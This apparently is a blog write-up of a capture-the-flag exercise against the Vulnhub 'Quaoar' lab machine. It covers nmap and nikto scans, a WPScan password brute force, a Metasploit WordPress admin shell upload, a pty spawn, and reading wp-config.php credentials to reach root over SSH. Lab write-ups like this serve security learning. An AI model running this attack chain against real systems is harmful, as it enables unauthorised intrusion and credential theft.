Vulnhub: Quoaor – CTF

Hello Cyberman!

This article subject CTF (Capture The Flag). This vulnerability machine is name “Quoaor”.

And this CTF is level 1. This machine as Ubuntu. And it is a OS.

If you want download please click it.

I be honest. I hated this machine. The has very easy solutions but I went try hard solutions.

If you are ready, okay we start.

First, I scanned with Nmap like every time. I find IP address of machine.

I used command in terminal like below:

$ nmap 192.168.0/16

Then I find machine ip address. This machine IP address: 192.168.1.20. Okay, now I run command in terminal like below for learning which running service this machine:

$ nmap 192.168.1.20 -Pn -sV -A

And I get result like below:

┌──(kali㉿kali)-[~]
└─$ nmap 192.168.1.20 -Pn -sV -A     
Starting Nmap 7.92 ( https://nmap.org ) at 2022-11-02 14:14 EDT
Nmap scan report for Quaoar.home (192.168.1.20)
Host is up (0.00063s latency).
Not shown: 991 closed tcp ports (conn-refused)
PORT    STATE SERVICE     VERSION
22/tcp  open  ssh         OpenSSH 5.9p1 Debian 5ubuntu1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   1024 d0:0a:61:d5:d0:3a:38:c2:67:c3:c3:42:8f:ae:ab:e5 (DSA)
|   2048 bc:e0:3b:ef:97:99:9a:8b:9e:96:cf:02:cd:f1:5e:dc (RSA)
|_  256 8c:73:46:83:98:8f:0d:f7:f5:c8:e4:58:68:0f:80:75 (ECDSA)
53/tcp  open  domain      ISC BIND 9.8.1-P1
| dns-nsid: 
|_  bind.version: 9.8.1-P1
80/tcp  open  http        Apache httpd 2.2.22 ((Ubuntu))
|_http-server-header: Apache/2.2.22 (Ubuntu)
| http-robots.txt: 1 disallowed entry 
|_Hackers
|_http-title: Site doesn't have a title (text/html).
110/tcp open  pop3?
|_ssl-date: 2022-11-02T18:17:35+00:00; -2s from scanner time.
| ssl-cert: Subject: commonName=ubuntu/organizationName=Dovecot mail server
| Not valid before: 2016-10-07T04:32:43
|_Not valid after:  2026-10-07T04:32:43
|_pop3-capabilities: RESP-CODES UIDL STLS CAPA TOP SASL PIPELINING
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
143/tcp open  imap        Dovecot imapd
|_ssl-date: 2022-11-02T18:17:35+00:00; -2s from scanner time.
| ssl-cert: Subject: commonName=ubuntu/organizationName=Dovecot mail server
| Not valid before: 2016-10-07T04:32:43
|_Not valid after:  2026-10-07T04:32:43
|_imap-capabilities: ENABLE IDLE more post-login STARTTLS SASL-IR capabilities LOGIN-REFERRALS Pre-login OK ID LOGINDISABLEDA0001 listed IMAP4rev1 have LITERAL+
445/tcp open  netbios-ssn Samba smbd 3.6.3 (workgroup: WORKGROUP)
993/tcp open  ssl/imap    Dovecot imapd
|_ssl-date: 2022-11-02T18:17:35+00:00; -2s from scanner time.
| ssl-cert: Subject: commonName=ubuntu/organizationName=Dovecot mail server
| Not valid before: 2016-10-07T04:32:43
|_Not valid after:  2026-10-07T04:32:43
|_imap-capabilities: ENABLE IDLE post-login more ID SASL-IR LOGIN-REFERRALS capabilities Pre-login AUTH=PLAINA0001 OK listed IMAP4rev1 have LITERAL+
995/tcp open  ssl/pop3s?
| ssl-cert: Subject: commonName=ubuntu/organizationName=Dovecot mail server
| Not valid before: 2016-10-07T04:32:43
|_Not valid after:  2026-10-07T04:32:43
|_pop3-capabilities: RESP-CODES UIDL SASL(PLAIN) CAPA TOP USER PIPELINING
|_ssl-date: 2022-11-02T18:17:35+00:00; -2s from scanner time.
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: mean: 39m58s, deviation: 1h37m59s, median: -2s
|_smb2-time: Protocol negotiation failed (SMB2)
|_nbstat: NetBIOS name: QUAOAR, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery: 
|   OS: Unix (Samba 3.6.3)
|   Computer name: Quaoar
|   NetBIOS computer name: 
|   Domain name: home
|   FQDN: Quaoar.home
|_  System time: 2022-11-02T14:17:27-04:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 190.27 seconds
zsh: segmentation fault  nmap 192.168.1.20 -Pn -sV -A

And now, I learned this is a website. I wrote in url area in Firefox Browser. And looked this website.

Then I clicked on the article “Click here to know what you need to do”.

This showed a picture for me. This picture like below:

Okay, I got in idea. Then I thinked like “This is a picture and maybe, has the info!”. And I wanted to see if there is a hidden file inside the picture. But not has. How to do it If you be curious, I showing.

Firstly, you need know it: Steganography. Please clicked for learning. If you enough idea, okay. There are a tools for steganography. It is name: Steghide. Please click for detail. Then I do tested with steghide. And I found. Yep, there is a file but with this is a password. If you know password, okay enter to password and take it a file. But you dont knowing password you cant get it file.

I downloaded picture and I entered command to terminal like below:

$ steghide info Hack_The_Planet.jpg

Then result like below:

Then I searched in Google. “How to crack in steghide?”. And I learned a tools. Its is name: “Stegcracker”. This tools used to a wordlist and try all password in wordlist.

For example, I tried a example:

I tried long time but nope. I can’t crack.. And I even tried wordlist named rockyou.txt. 🙁 Then again a I started and scanned this website with nikto.

┌──(kali㉿kali)-[~]
└─$ nikto -h 192.168.1.20 
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.1.20
+ Target Hostname:    192.168.1.20
+ Target Port:        80
+ Start Time:         2022-11-02 14:28:26 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.2.22 (Ubuntu)
+ Server may leak inodes via ETags, header found with file /, inode: 133975, size: 100, mtime: Mon Oct 24 00:00:10 2016
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Retrieved x-powered-by header: PHP/5.3.10-1ubuntu3
+ Entry '/wordpress/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ "robots.txt" contains 2 entries which should be manually viewed.
+ Uncommon header 'tcn' found, with contents: list
+ Apache mod_negotiation is enabled with MultiViews, which allows attackers to easily brute force file names. See http://www.wisec.it/sectou.php?id=4698ebdc59d15. The following alternatives for 'index' were found: index.html
+ Apache/2.2.22 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ Allowed HTTP Methods: POST, OPTIONS, GET, HEAD 
+ OSVDB-3233: /icons/README: Apache default file found.
+ 8727 requests: 0 error(s) and 12 item(s) reported on remote host
+ End Time:           2022-11-02 14:28:42 (GMT-4) (16 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

Nikto given to result like above. And I seen a word like gold! WORDPRESS… Then I went to url address: “http://192.168.1.20/wordpress/“.

Finally, I found a website. And then scanned with dirb. (Dirb: Website is scanner. This tool look at the sub directory.) But I dont found not enough result. I scanned this wordpress with WPScan tool.

Then I get result like below:

┌──(kali㉿kali)-[~/Desktop/Quoaor]
└─$ wpscan --url http://192.168.1.20/wordpress/                                          
_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.22
       Sponsored by Automattic - https://automattic.com/
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[i] It seems like you have not updated the database for some time.
[?] Do you want to update now? [Y]es [N]o, default: [N]y
[i] Updating the Database ...
[i] Update completed.

[+] URL: http://192.168.1.20/wordpress/ [192.168.1.20]
[+] Started: Thu Nov 10 15:42:27 2022

Interesting Finding(s):

[+] Headers
 | Interesting Entries:
 |  - Server: Apache/2.2.22 (Ubuntu)
 |  - X-Powered-By: PHP/5.3.10-1ubuntu3
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] XML-RPC seems to be enabled: http://192.168.1.20/wordpress/xmlrpc.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%
 | References:
 |  - http://codex.wordpress.org/XML-RPC_Pingback_API
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
 |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/

[+] WordPress readme found: http://192.168.1.20/wordpress/readme.html
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] Upload directory has listing enabled: http://192.168.1.20/wordpress/wp-content/uploads/
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] The external WP-Cron seems to be enabled: http://192.168.1.20/wordpress/wp-cron.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 60%
 | References:
 |  - https://www.iplocation.net/defend-wordpress-from-ddos
 |  - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 3.9.39 identified (Outdated, released on 0001-01-01).
 | Found By: Rss Generator (Passive Detection)
 |  - http://192.168.1.20/wordpress/?feed=rss2, <generator>https://wordpress.org/?v=3.9.39</generator>
 |  - http://192.168.1.20/wordpress/?feed=comments-rss2, <generator>https://wordpress.org/?v=3.9.39</generator>

[+] WordPress theme in use: twentyfourteen
 | Location: http://192.168.1.20/wordpress/wp-content/themes/twentyfourteen/
 | Last Updated: 2022-11-02T00:00:00.000Z
 | [!] The version is out of date, the latest version is 3.5
 | Style URL: http://192.168.1.20/wordpress/wp-content/themes/twentyfourteen/style.css?ver=3.9.39
 | Style Name: Twenty Fourteen
 | Style URI: http://wordpress.org/themes/twentyfourteen
 | Description: In 2014, our default theme lets you create a responsive magazine website with a sleek, modern design...
 | Author: the WordPress team
 | Author URI: http://wordpress.org/
 |
 | Found By: Css Style In Homepage (Passive Detection)
 |
 | Version: 1.1 (80% confidence)
 | Found By: Style (Passive Detection)
 |  - http://192.168.1.20/wordpress/wp-content/themes/twentyfourteen/style.css?ver=3.9.39, Match: 'Version: 1.1'

[+] Enumerating All Plugins (via Passive Methods)
[+] Checking Plugin Versions (via Passive and Aggressive Methods)

[i] Plugin(s) Identified:

[+] mail-masta
 | Location: http://192.168.1.20/wordpress/wp-content/plugins/mail-masta/
 | Latest Version: 1.0 (up to date)
 | Last Updated: 2014-09-19T07:52:00.000Z
 |
 | Found By: Urls In Homepage (Passive Detection)
 |
 | Version: 1.0 (80% confidence)
 | Found By: Readme - Stable Tag (Aggressive Detection)
 |  - http://192.168.1.20/wordpress/wp-content/plugins/mail-masta/readme.txt

[+] Enumerating Config Backups (via Passive and Aggressive Methods)
 Checking Config Backups - Time: 00:00:00 <================================================================================================================> (137 / 137) 100.00% Time: 00:00:00

[i] No Config Backups Found.

[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register

[+] Finished: Thu Nov 10 15:42:30 2022
[+] Requests Done: 186
[+] Cached Requests: 5
[+] Data Sent: 48.925 KB
[+] Data Received: 12.298 MB
[+] Memory used: 243.664 MB
[+] Elapsed time: 00:00:03

Okay now, I learned. There is a username is admin. Then now, I crack it user. I need tool a wordlist. I choose a ready wordlist name is john.lst.

I entered to command in terminal:

$ wpscan --url http://192.168.1.20/wordpress/ --passwords /usr/share/wordlists/john.lst

Perfect result! I found a admin user and his password. Username: admin, password: admin.
Is it a joke? Anyways.

I entered WordPress admin panel with admin user. And I discovered this panel. Then run msfconsole in terminal .

I love it this framework. Then I searched a exploit in msfconsole. I entered command like below:

msf6 > grep shell search wordpress

Then I found a two result.

  • 20 exploit/unix/webapp/wp_admin_shell_upload 2015-02-21 excellent Yes WordPress Admin Shell Upload
  • 70 exploit/unix/webapp/wp_symposium_shell_upload 2014-12-11 excellent Yes WordPress WP Symposium 14.11 Shell Upload

And I used exploit of number 20. It is name: exploit/unix/webapp/wp_admin_shell_upload

Result like above picture. And it want a bit parameters. For example: username, password, Rhosts etc.

I filled in the required fields.

And I ran it with the “run” command.

And now, I’m inside. I entered go to terminal with “shell” command. Then for direct run in terminal I entered run this command: python -c ‘import pty;pty.spawn(“bin/bash”)’

Okay now, I searched in machine terminal with www-data user. And wp-config.php file for I went to path “/var/www/”. Then I read the wp-config file with the “cat” command. As seen in the picture below:

Most important info! There is a root user info. I used this info. This info like below:

// ** MySQL settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define('DB_NAME', 'wordpress');

/** MySQL database username */
define('DB_USER', 'root');

/** MySQL database password */
define('DB_PASSWORD', 'rootpassword!');

/** MySQL hostname */
define('DB_HOST', 'localhost');

/** Database Charset to use in creating database tables. */
define('DB_CHARSET', 'utf8');

User: root

Password: rootpassword!

I used this info and I entered this machine with root user in SSH.

And… Finally! I capture the flag.

Have a nice day with lots of informatics. 🙂

3 Comments

  1. Very nice post. I just stumbled upon your blog and wanted to say that I’ve really enjoyed browsing your blog posts. In any case I’ll be subscribing to your feed and I hope you write again soon!

Leave a Reply

Your email address will not be published. Required fields are marked *